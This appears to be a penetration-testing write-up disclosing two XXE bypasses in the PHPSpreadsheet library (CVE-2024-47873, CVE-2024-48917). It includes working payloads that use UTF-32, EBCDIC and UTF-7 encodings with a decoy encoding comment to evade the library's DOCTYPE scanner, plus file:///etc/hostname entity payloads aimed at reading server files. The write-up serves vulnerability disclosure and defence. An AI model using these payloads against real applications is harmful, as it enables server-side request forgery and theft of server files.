Introduction
During a penetration test, you often encounter web applications that are either built on third-party products or developed from scratch; in both cases, external libraries invariably come into play. Reusing libraries typically improves both code quality and security. It also gives penetration testers the chance to dig into the component's source code, uncover new vulnerabilities and potentially gain access to the application.
This is exactly what happened to Antonio Rocco Spataro and Antonio Russo during a penetration test for Unlock Security on an application that utilizes the PHPSpreadsheet library. PHPSpreadsheet is the premier open-source PHP library for reading and writing spreadsheets in various formats, such as Excel and LibreOffice Calc, and it now boasts over 218 million installations along with more than 1,200 projects that rely on it as a dependency.
In this article, we'll walk you through, step by step, how we uncovered two zero-day vulnerabilities that enabled an XML External Entity (XXE) attack, circumventing both the library's built-in protections and the patches its developers subsequently released.
Setting up the test environment
As is often the case, to both protect the client's application and streamline our analysis, a dedicated test environment is set up for the testing process.
So that anyone interested can explore this vulnerability, we've made a ready-to-use test environment available, based on VS Code Dev Containers. The project structure is as follows:
.
├── composer.json
├── .devcontainer
│   ├── devcontainer.json
│   └── Dockerfile
├── index.php
├── payload.xlsx
└── .vscode
    └── launch.json
The composer.json file specifies the library name and version to include in the project. In this case that is only PHPSpreadsheet, and it must be a vulnerable version prior to 3.4.0. We opted for version 3.3.0:
{
  "require": {
    "phpoffice/phpspreadsheet": "3.3.0"
  }
}
The .devcontainer/Dockerfile sets up a testing environment with all the dependencies the library needs to work correctly for our purposes:
FROM mcr.microsoft.com/devcontainers/php:8-bullseye
# Install system dependencies
RUN export DEBIAN_FRONTEND=noninteractive && \
apt-get update && \
apt-get -y install --no-install-recommends \
libpng-dev \
libxml2-dev \
libzip-dev
# Install PHP extensions
RUN docker-php-ext-install gd xml zip
The .devcontainer/devcontainer.json file tells VS Code to build the container from the Dockerfile, install the project dependencies with Composer, and install the PHP Debug extension (xdebug.php-debug) to ease PHP code analysis:
{
  "name": "Pentesting PHPSpreadsheet",
  "context": ".",
  "dockerFile": "Dockerfile",
  "customizations": {
    "vscode": {
      "extensions": [
        "xdebug.php-debug"
      ]
    }
  },
  "portsAttributes": {
    "9000": {
      "label": "PHP XDebug",
      "onAutoForward": "ignore"
    }
  },
  "postCreateCommand": "composer install"
}
Next, we create a simple PHP snippet that uses PHPSpreadsheet to open our XLSX payload and print the contents of the active worksheet's cells:
<?php
require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;
// Explicitly create an XLSX reader instead of letting IOFactory guess the format
$inputFileType = 'Xlsx';
$inputFileName = 'payload.xlsx';
$reader = IOFactory::createReader($inputFileType);
// load() unzips the archive and parses its XML parts; XmlScanner runs at this step
$spreadsheet = $reader->load($inputFileName);
// Print the cells of the active worksheet as a nested array
$worksheet = $spreadsheet->getActiveSheet();
print_r($worksheet->toArray());
Once the Dev Containers extension is installed in VS Code, we're all set to launch our test environment and begin vulnerability analysis, though not before briefly explaining how the XLSX format works.
The XLSX format
XLSX files have become a widely adopted standard for managing spreadsheets. In essence, an XLSX file is a ZIP archive that contains several XML files structured according to the Office Open XML (OOXML) specifications.
To better understand the structure and the key files involved in exploiting the vulnerability, let's create a sample XLSX file with a spreadsheet application. The file contains a single string in its first cell.
Once the file is saved, you can use the unzip utility to inspect its internal structure:
$ unzip -l sample-file.xlsx
Archive: sample-file.xlsx
Length Date Time Name
--------- ---------- ----- ----
681 2025-03-02 12:32 xl/_rels/workbook.xml.rels
878 2025-03-02 12:32 xl/workbook.xml
2257 2025-03-02 12:32 xl/theme/theme1.xml
4451 2025-03-02 12:32 xl/styles.xml
2247 2025-03-02 12:32 xl/worksheets/sheet1.xml
212 2025-03-02 12:32 xl/sharedStrings.xml
571 2025-03-02 12:32 _rels/.rels
731 2025-03-02 12:32 docProps/core.xml
412 2025-03-02 12:32 docProps/app.xml
1480 2025-03-02 12:32 [Content_Types].xml
--------- -------
13920 10 files
Inside this archive, you'll find documents such as workbook.xml, which defines the overall structure of the file and contains references to the individual worksheets:
<!-- xl/workbook.xml -->
...
<sheets>
<sheet name="FirstSheet" sheetId="1" state="visible" r:id="rId2"/>
</sheets>
...
The sharedStrings.xml file plays a crucial role in managing text strings used in cells. Instead of storing the text directly in each cell, all unique strings are saved in this file so they can be reused multiple times, thus reducing redundancy and optimizing space.
In the sharedStrings.xml file, the root element is <sst> (shared string table), which encompasses all <si> (shared string item) elements. Each <si> contains the text, usually enclosed in a <t> (text) element, or a more complex structure called <r> (RichTextRun) to handle formatted text:
<!-- xl/sharedStrings.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">this is a string</t>
</si>
</sst>
The sheet1.xml file contains the actual data for the cells in the first sheet. Cells containing text use the attribute t="s" to indicate that their content is a reference to the shared string table. Inside the cell, the <v> element holds a numeric index that points to the corresponding string in sharedStrings.xml.
<!-- xl/worksheets/sheet1.xml -->
...
<sheetData>
<row r="1" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
<c r="A1" s="0" t="s">
<v>0</v>
</c>
</row>
</sheetData>
...
Each XML file thus plays a specific role in defining the appearance, data, and formatting of the document.
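The following minimal Python sketch (standard library only) shows how the two files fit together. It packs just the two parts shown above into an in-memory archive and resolves each t="s" cell through the shared string table. It simplifies heavily and is not how PHPSpreadsheet reads files: a real XLSX also contains the other parts listed by unzip, and rich-text <r> runs are ignored here.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

SHARED_STRINGS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si><t xml:space="preserve">this is a string</t></si>
</sst>"""

SHEET1 = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData><row r="1"><c r="A1" s="0" t="s"><v>0</v></c></row></sheetData>
</worksheet>"""


def build_archive() -> bytes:
    """Pack only the two parts discussed above into an in-memory ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", SHARED_STRINGS)
        zf.writestr("xl/worksheets/sheet1.xml", SHEET1)
    return buf.getvalue()


def read_cells(xlsx: bytes) -> dict[str, str]:
    """Map cell references to values, resolving t="s" cells via the string table."""
    with zipfile.ZipFile(io.BytesIO(xlsx)) as zf:
        sst = ET.fromstring(zf.read("xl/sharedStrings.xml"))
        sheet = ET.fromstring(zf.read("xl/worksheets/sheet1.xml"))
    # Only plain <t> items are handled; <r> rich-text runs are ignored in this sketch
    strings = [si.findtext("m:t", default="", namespaces=NS) for si in sst.findall("m:si", NS)]
    cells = {}
    for c in sheet.iterfind(".//m:c", NS):
        value = c.findtext("m:v", default="", namespaces=NS)
        cells[c.get("r")] = strings[int(value)] if c.get("t") == "s" else value
    return cells


print(read_cells(build_archive()))  # {'A1': 'this is a string'}
```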
PHPSpreadsheet and the XXE vulnerabilities
Given the extensive reliance on XML files, it might seem natural to use a basic XXE payload to either read system files or trigger HTTP requests. One approach is to unpack the XLSX file, modify one of its XML files by inserting the malicious payload, repackage it as an XLSX archive, and then open it with PHPSpreadsheet.
Let's attempt this by modifying the sharedStrings.xml file as follows:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
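The unpack, edit and repack cycle described above can be scripted. The Python sketch below (standard library only) copies every member of an existing archive and swaps in new bytes for a single part. The helper name replace_part is our own and is not part of any tool.

```python
import io
import zipfile


def replace_part(xlsx: bytes, part_name: str, new_content: bytes) -> bytes:
    """Return a copy of an XLSX (ZIP) archive with one member's bytes replaced."""
    with zipfile.ZipFile(io.BytesIO(xlsx)) as src:
        if part_name not in src.namelist():
            raise KeyError(f"{part_name} not found in archive")
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for name in src.namelist():
                data = new_content if name == part_name else src.read(name)
                # Members are rewritten by name, so their timestamps are reset
                dst.writestr(name, data)
    return out.getvalue()
```

For example, calling replace_part(original_bytes, "xl/sharedStrings.xml", payload_bytes) and writing the result to payload.xlsx gives the test file loaded by index.php.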
In this scenario, we expect an XXE-vulnerable parser processing sharedStrings.xml to issue an HTTP request to the specified address in order to load an external DTD. When we run our code snippet in the test environment, however, we get the following output:
Fatal error: Uncaught PhpOffice\PhpSpreadsheet\Reader\Exception: Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php:82
Stack trace:
#0 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(123): PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner->scan('<?xml version="...')
#1 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(700): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadZip('xl/sharedString...', 'http://schemas....')
#2 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/BaseReader.php(194): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadSpreadsheetFromFile('./assets/sample...')
#3 /workspaces/phpspreadsheet/index.php(13): PhpOffice\PhpSpreadsheet\Reader\BaseReader->load('./assets/sample...')
#4 {main}
thrown in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php on line 82
PHPSpreadsheet successfully identifies the XXE attempt and halts the process. The next question is: how exactly does it perform this validation?
Security checks in PHPSpreadsheet
As the stack trace indicated earlier, PHPSpreadsheet's security mechanisms are implemented in the class PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner, specifically within the scan($xml) method, which is defined as follows:
public function scan($xml): string
{
$xml = "$xml";
$xml = $this->toUtf8($xml);
// Don't rely purely on libxml_disable_entity_loader()
$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';
if (preg_match($pattern, $xml)) {
throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
// …
}
The check scans the XML for the string <!DOCTYPE, optionally interleaved with single null bytes (e.g., \0<\0!\0D\0O\0C\0T\0Y\0P\0E\0). This accounts for 16-bit encodings such as UTF-16, which is commonly used on Windows.
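To see which inputs this check catches, here is a byte-level Python approximation of the PHP regex. It is not the library's code. It assumes, as described above, that $this->pattern is <!DOCTYPE, and it uses Python's re module in place of PHP's preg_match.

```python
import re

# Approximation of '/\\0?' . implode('\\0?', str_split('<!DOCTYPE')) . '\\0?/':
# at most ONE optional NUL byte may sit next to each character.
ORIGINAL_DOCTYPE = re.compile(
    rb"\x00?" + rb"\x00?".join(re.escape(bytes([b])) for b in b"<!DOCTYPE") + rb"\x00?"
)


def original_scan_flags(xml: bytes) -> bool:
    """True if the original XmlScanner pattern would abort the load."""
    return ORIGINAL_DOCTYPE.search(xml) is not None


decl = "<!DOCTYPE sst>"
for codec in ("utf-8", "utf-16-le", "utf-16-be"):
    print(codec, original_scan_flags(decl.encode(codec)))  # True in all three cases
```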
Although both the method's documentation and the exception message imply that the check targets <!ENTITY occurrences, our tests have shown that it actually looks for <!DOCTYPE. This is likely because a DOCTYPE declaration alone is enough to carry out an XXE attack, for example by referencing an external DTD.
Before performing this scan, the XML is converted to UTF-8 by the toUtf8($xml) method, whose implementation is as follows:
private function toUtf8(string $xml): string
{
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
}
return $xml;
}
To determine the character encoding used in the XML, the findCharSet($xml) method is employed. It searches for the string encoding="<encoding>", tolerating extra whitespace and either single or double quotes. If an encoding is found, it is returned in uppercase; otherwise, the method defaults to UTF-8.
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
CVE-2024-47873
At first glance, PHPSpreadsheet's security measures may seem both simple and effective, but are they really foolproof? Under what conditions can an XXE payload slip past all the checks?
The answer lies in the XML specification, specifically in the "Autodetection of Character Encodings (Non-Normative)" section. Every XML entity that is not in UTF-8 or UTF-16 (and has no external encoding information) must begin with an XML declaration, whose first characters are always <?xml. As a result, a parser can determine the encoding family by reading just the first two to four bytes and matching them against the following table:
00 00 00 3C, 3C 00 00 00, 00 00 3C 00, 00 3C 00 00: UCS-4 or any other 32-bit encoding in which ASCII characters are encoded using their standard ASCII values.
00 3C 00 3F: UTF-16BE, ISO-10646-UCS-2 (big endian), or other 16-bit big endian encodings where ASCII characters remain intact.
3C 00 3F 00: UTF-16LE, ISO-10646-UCS-2 (little endian), or similar 16-bit little endian encodings where ASCII characters remain intact.
3C 3F 78 6D: UTF-8, ISO 646, ASCII, some parts of ISO 8859, Shift-JIS, EUC, or other 7-bit, 8-bit or variable-length encodings in which ASCII characters keep their normal positions, widths and values.
4C 6F A7 94: EBCDIC.
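The table can be expressed as a simple lookup. In this Python sketch, encoding_family is a hypothetical name and is not part of libxml2. The sketch ignores the byte-order-mark cases that the specification also lists, and it uses Python's cp500 codec as a representative EBCDIC code page.

```python
# Hypothetical helper classifying the first four bytes of a BOM-less XML document
SIGNATURES = {
    b"\x00\x00\x00\x3c": "32-bit",
    b"\x3c\x00\x00\x00": "32-bit",
    b"\x00\x00\x3c\x00": "32-bit",
    b"\x00\x3c\x00\x00": "32-bit",
    b"\x00\x3c\x00\x3f": "16-bit big endian",
    b"\x3c\x00\x3f\x00": "16-bit little endian",
    b"\x3c\x3f\x78\x6d": "ASCII-compatible",
    b"\x4c\x6f\xa7\x94": "EBCDIC",
}


def encoding_family(data: bytes) -> str:
    """Return the encoding family suggested by the first four bytes."""
    # Anything else: UTF-8 without a declaration, or a mislabeled stream
    return SIGNATURES.get(data[:4], "other")


for codec in ("utf-32-be", "utf-32-le", "utf-16-be", "utf-16-le", "utf-8", "cp500"):
    print(codec, encoding_family("<?xml".encode(codec)))
```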
The scan($xml) function only flags an XXE attempt if it finds either the literal string <!DOCTYPE or its variant interleaved with single null bytes (\0<\0!\0D\0O\0C\0T\0Y\0P\0E\0). We can therefore evade it with a 32-bit encoding, which places more than one null byte next to each ASCII character. For example, the resulting string could look like this: \0\0\0<\0\0\0!\0\0\0D\0\0\0O\0\0\0C\0\0\0T\0\0\0Y\0\0\0P\0\0\0E\0\0\0, with three null bytes preceding every ASCII character. To achieve this, we can use either the UTF-32BE or the UTF-32LE encoding. In UTF-32LE, the three null bytes follow each character instead of preceding it.
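One quick way to check the bypass is to reproduce the original pattern in Python and feed it the payload in both UTF-8 and UTF-32BE. Python's utf-32-be codec produces the same BOM-less byte layout as the CyberChef conversion used later. The regex approximates the PHP one at the byte level, assuming $this->pattern is <!DOCTYPE; libxml2 itself is not modeled.

```python
import re

# Approximation of the original check: at most one NUL byte between characters
ORIGINAL_DOCTYPE = re.compile(
    rb"\x00?" + rb"\x00?".join(re.escape(bytes([b])) for b in b"<!DOCTYPE") + rb"\x00?"
)

payload = '<!DOCTYPE sst [<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe"> %ext;]>'

utf8 = payload.encode("utf-8")
utf32 = payload.encode("utf-32-be")  # no BOM: every character becomes 4 bytes

print(utf32[:8])                               # b'\x00\x00\x00<\x00\x00\x00!'
print(ORIGINAL_DOCTYPE.search(utf8) is None)   # False: the plain payload is caught
print(ORIGINAL_DOCTYPE.search(utf32) is None)  # True: three NULs per gap slip through
```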
Some might object that our payload is converted to UTF-8 before the security checks run, thereby stripping out the null bytes and invalidating our approach.
However, a closer look at the implementations of the toUtf8($xml) and findCharSet($xml) methods reveals why this isn't the case:
private function toUtf8(string $xml): string
{
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
}
return $xml;
}
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
Notice that the conversion to UTF-8 only occurs when the detected encoding isn't UTF-8. However, the encoding is detected using regular expressions that do not account for null bytes. If none of these expressions matches, the function defaults to returning "UTF-8". Consequently, if the whole payload, including its encoding declaration, is encoded in UTF-32BE, the declaration goes unnoticed and no conversion takes place.
Even though our XML payload isn't converted, it still functions as intended because libxml2, the underlying library PHPSpreadsheet relies on for XML parsing, adheres to the standard. It correctly determines the encoding by reading the first 4 bytes of the payload.
With that in mind, we create our payload in UTF-32BE. For this purpose, we use CyberChef, an online tool that facilitates various encoding conversions.
We copy the payload into CyberChef's input window, select UTF-32BE as the target encoding, and save the resulting file, overwriting the existing sharedStrings.xml. Next, we repackage the files into a ZIP archive with an .xlsx extension and run our proof of concept. Before doing so, we make sure an HTTP server is listening on port 1337 to capture the outgoing request (for instance, by running php -S 127.0.0.1:1337).
Fixing the issue
The first remedy proposed by the PHPSpreadsheet developers involved modifying the regular expression responsible for detecting the doctype. The updated expression now accounts for the presence of multiple null bytes rather than just one. In other words, the original pattern:
$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';
was replaced with this more robust version:
$pattern = '/\0*' . implode('\0*', mb_str_split($this->pattern, 1, 'UTF-8')) . '\0*/';
Bypassing the fix
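Attentive readers might recall that the automatically detected encodings also include EBCDIC (here, EBCDIC-INT). Unlike the UTF-based encodings, EBCDIC does not rely on null bytes. Instead, the characters of <!DOCTYPE and encoding= map to byte values that differ entirely from their ASCII counterparts. As a result, neither the DOCTYPE pattern nor the findCharSet regexes can match, while libxml2 still recognizes the 4C 6F A7 94 signature. This loophole bypasses the security checks once again.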
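The sketch below approximates the patched regex in Python and compares a UTF-32BE payload with an EBCDIC one. It assumes that Python's cp500 codec (EBCDIC International) is a fair stand-in for the EBCDIC variant discussed here. It only models PHPSpreadsheet's regex, not libxml2's decoding.

```python
import re

# Approximation of the patched check: ANY number of NUL bytes around each character
FIXED_DOCTYPE = re.compile(
    rb"\x00*" + rb"\x00*".join(re.escape(bytes([b])) for b in b"<!DOCTYPE") + rb"\x00*"
)

payload = '<?xml version="1.0"?><!DOCTYPE sst [<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe"> %ext;]>'

utf32 = payload.encode("utf-32-be")
ebcdic = payload.encode("cp500")  # cp500 assumed as a stand-in for EBCDIC-INT

print(FIXED_DOCTYPE.search(utf32) is not None)   # True: UTF-32 is now caught
print(FIXED_DOCTYPE.search(ebcdic) is not None)  # False: "<" is 0x4C, not 0x3C
print(ebcdic[:4].hex())                          # 4c6fa794, the EBCDIC signature
```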
To address this issue, the developers restricted the use of the EBCDIC encoding by modifying the findCharSet($xml) method as follows:
private function findCharSet(string $xml): string
{
    if (substr($xml, 0, 4) === "\x4c\x6f\xa7\x94") {
        throw new Reader\Exception('EBCDIC encoding not permitted');
    }
    // …
}
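Here is a Python port of the new guard, written for illustration only (reject_ebcdic is our own name). Because the check compares raw bytes, it rejects any EBCDIC code page in which <?xm encodes to the same four bytes. The sketch assumes that Python's cp500 and cp037 codecs are representative of such code pages.

```python
EBCDIC_SIGNATURE = b"\x4c\x6f\xa7\x94"  # "<?xm" in EBCDIC


def reject_ebcdic(xml: bytes) -> None:
    """Refuse documents that start with the EBCDIC signature, like the patched findCharSet()."""
    if xml[:4] == EBCDIC_SIGNATURE:
        raise ValueError("EBCDIC encoding not permitted")


for codec in ("cp500", "cp037"):
    try:
        reject_ebcdic('<?xml version="1.0"?>'.encode(codec))
    except ValueError as exc:
        print(codec, "->", exc)

reject_ebcdic(b'<?xml version="1.0"?>')  # ASCII-compatible input passes silently
```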
CVE-2024-48917
Following the release of a new PHPSpreadsheet version that patched the previous vulnerability, researchers Antonio Rocco Spataro and Antonio Russo continued analyzing the library. They discovered yet another potential vector for achieving an XXE attack.
Let's revisit the findCharSet($xml) method:
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
This function iterates over two regular expressions, looking anywhere in the XML file for an encoding="<encoding>" (double quotes) or encoding='<encoding>' (single quotes) declaration. The first match found determines the encoding used.
However, if both patterns match different parts of the XML file, the function will always return the value specified inside double quotes, as it's processed first.
For example, with an XML header like <?xml version="1" encoding='A' encoding="B"?>, the detected encoding would be "B". The same applies to the following case:
<?xml version="1" encoding='A'?>
<root>
<aTag attribute="value">text</aTag>
<!--encoding="B"-->
</root>
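The precedence rule is easy to reproduce. This Python port of findCharSet copies both patterns as-is, including the odd "]?" in the double-quoted one, and tries them in the same order. It runs on raw bytes and uses Python's re module as a stand-in for preg_match.

```python
import re

# The two findCharSet() patterns, tried in order: double quotes first
CHARSET_PATTERNS = [
    re.compile(rb'encoding\s*=\s*"([^"]*]?)"'),
    re.compile(rb"encoding\s*=\s*'([^']*?)'"),
]


def find_charset(xml: bytes) -> str:
    """Return the first declared encoding, upper-cased, or UTF-8 if none is found."""
    for pattern in CHARSET_PATTERNS:
        match = pattern.search(xml)
        if match:
            return match.group(1).decode("latin-1").upper()
    return "UTF-8"


header_only = b"""<?xml version="1" encoding='A' encoding="B"?>"""
with_comment = b"""<?xml version="1" encoding='A'?>
<root>
<aTag attribute="value">text</aTag>
<!--encoding="B"-->
</root>"""

print(find_charset(header_only))   # B
print(find_charset(with_comment))  # B
```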
Why is this useful? In the previous CVE, we established that scan($xml) fails to detect a <!DOCTYPE declaration when the XML file uses an encoding that PHPSpreadsheet does not detect and convert, such as UTF-32. The libxml2 library, which PHPSpreadsheet relies on, can nonetheless recognize the encoding and process the file correctly.
This opens the door to a new XXE vulnerability. It works if we can make PHPSpreadsheet treat a file as UTF-8, so that it skips the conversion and scans the raw bytes, while libxml2 still decodes the file using its real encoding.
Beyond UTF-8 and UTF-16, which every XML processor is required to support, libxml2 can handle many other encodings, typically through iconv. These include 7-bit encodings such as UTF-7. A UTF-7 document falls under the 3C 3F 78 6D case (the bytes of <?xm). Because many encodings start with this sequence, we must explicitly declare encoding='UTF-7' so that libxml2 interprets the file correctly.
The key advantage of UTF-7 is that it represents data using only ASCII characters, so a UTF-7 document can mix plain ASCII text with encoded segments. This means we can selectively encode specific characters. For instance, encoding < as +ADw- turns <!DOCTYPE into +ADw-!DOCTYPE, which PHPSpreadsheet's security checks no longer recognize.
You can easily convert text to UTF-7 using CyberChef or similar tools.
The resulting payload would look like this:
<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<si>
<t xml:space="preserve">this is a string</t>
</si>
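However, there's a catch: PHPSpreadsheet will detect the encoding='UTF-7' declaration and convert the XML file to UTF-8, making the malicious payload visible again. We can work around this by appending a misleading, double-quoted encoding declaration inside an XML comment, such as <!--encoding="UTF-8"-->. Since findCharSet($xml) tries the double-quoted pattern first, it returns UTF-8 and skips the conversion, while libxml2 simply ignores the comment.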
In XML, attributes must be unique within the same tag, so we cannot simply write <?xml version="1.0" encoding='UTF-7' encoding="UTF-8"?>. Similarly, adding an unknown attribute such as <?xml version="1.0" encoding='UTF-7' exampleencoding="UTF-8"?> to the prolog causes a parsing error:
$ xmllint file.xml
file.xml:1: parser error : parsing XML declaration: '?>' expected
<?xml version="1.0" exampleencoding='UTF-8'?>
Here's the final payload:
<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<si>
<t xml:space="preserve">this is a string</t>
</si>
<!--encoding="UTF-8"-->
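The following Python sketch models the checks this payload has to get past and shows why the decoy comment matters. It is a simplified model. The findCharSet patterns are copied from the code above, and the DOCTYPE regex is the patched version. Python's codecs stand in for both PHP's mb_convert_encoding and libxml2's UTF-7 decoder, on the assumption that their codec names and behavior line up.

```python
import re

CHARSET_PATTERNS = [
    re.compile(rb'encoding\s*=\s*"([^"]*]?)"'),
    re.compile(rb"encoding\s*=\s*'([^']*?)'"),
]
# Patched DOCTYPE check: any number of NUL bytes around each character
FIXED_DOCTYPE = re.compile(
    rb"\x00*" + rb"\x00*".join(re.escape(bytes([b])) for b in b"<!DOCTYPE") + rb"\x00*"
)


def find_charset(xml: bytes) -> str:
    for pattern in CHARSET_PATTERNS:
        match = pattern.search(xml)
        if match:
            return match.group(1).decode("latin-1").upper()
    return "UTF-8"


def passes_scanner(xml: bytes) -> bool:
    """Simplified model of toUtf8() followed by the patched DOCTYPE regex."""
    charset = find_charset(xml)
    if charset != "UTF-8":
        xml = xml.decode(charset).encode("utf-8")  # stand-in for mb_convert_encoding()
        if find_charset(xml) != "UTF-8":
            return False  # "Suspicious Double-encoded XML"
    return FIXED_DOCTYPE.search(xml) is None


FINAL = b"""<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<si>
<t xml:space="preserve">this is a string</t>
</si>
<!--encoding="UTF-8"-->"""

WITHOUT_DECOY = FINAL.replace(b'<!--encoding="UTF-8"-->', b"")

print(find_charset(FINAL), passes_scanner(FINAL))                  # UTF-8 True
print(find_charset(WITHOUT_DECOY), passes_scanner(WITHOUT_DECOY))  # UTF-7 False
print("<!DOCTYPE" in FINAL.decode("utf-7"))  # True: what a UTF-7 decoder sees
```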
Now, we insert this payload into an XLSX file, execute it, and check the result.
As expected, PHPSpreadsheet fails to detect the attack, and shortly after, we observe an HTTP request to http://127.0.0.1:1337/we_got_xxe.
From blind SSRF to arbitrary file read
So far, we've demonstrated how to achieve blind SSRF through an XXE vulnerability. At first glance, it might seem like we could simply modify our XXE payload to read and exfiltrate data, using something like this:
<!DOCTYPE sst [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
However, by default libxml2 is not invoked with the LIBXML_NOENT option, which is required to replace external entities within an XML file. Internal entity substitution, on the other hand, still works as expected. For example, with the following payload, the first cell of the spreadsheet would contain the string "a sample string":
<!DOCTYPE sst [
<!ENTITY xxe "a sample string">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
Now, the key question is: can we exploit this behavior to read a file's contents? Let's start with the following payload:
<!DOCTYPE sst [
<!ENTITY % hostname SYSTEM "file:///etc/hostname">
%hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
This payload loads the contents of /etc/hostname into the parameter entity hostname, which is then expanded inside the DTD wherever %hostname; appears. However, the document still references an xxe entity that is never defined, so this alone won't work.
Now, consider a scenario where the hostname itself were something like <!ENTITY xxe "a very unusual hostname">. Expanding %hostname; would then declare a new xxe entity, making it available for substitution inside sharedStrings.xml.
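The idea can be checked without PHP or libxml2. This Python sketch uses the standard xml.etree.ElementTree parser, which is backed by expat rather than libxml2. It inlines the text that %hostname; would expand to: hypothetical file contents wrapped in the prefix <!ENTITY xxe ' and the suffix '>. It also shows the practical catch. The file contents must be valid inside the quoted entity value, so a single quote breaks the declaration.

```python
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
PREFIX = "<!ENTITY xxe '"  # text to prepend to the file contents
SUFFIX = "'>"              # text to append to the file contents


def simulate_leak(file_contents: str) -> str:
    """Inline the expansion of %hostname; and return the text of the first <t>."""
    declaration = PREFIX + file_contents + SUFFIX
    document = (
        "<!DOCTYPE sst [\n" + declaration + "\n]>\n"
        '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        "<si><t>&xxe;</t></si></sst>"
    )
    root = ET.fromstring(document)
    return root.findtext("m:si/m:t", namespaces=NS)


print(simulate_leak("a very unusual hostname"))  # a very unusual hostname
```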
If we could somehow force the inclusion of a prefix and a suffix, we could control the structure of the injected entity and use it to leak arbitrary files.
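The solution lies in WrapWrap, a tool developed by Ambionics. WrapWrap chains php://filter gadgets to add arbitrary prefixes and suffixes to file contents, turning raw file data into a usable XML entity declaration. This is possible because, in PHP, libxml2 loads external resources through PHP's stream wrappers, so a php://filter URL is accepted as a SYSTEM identifier.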
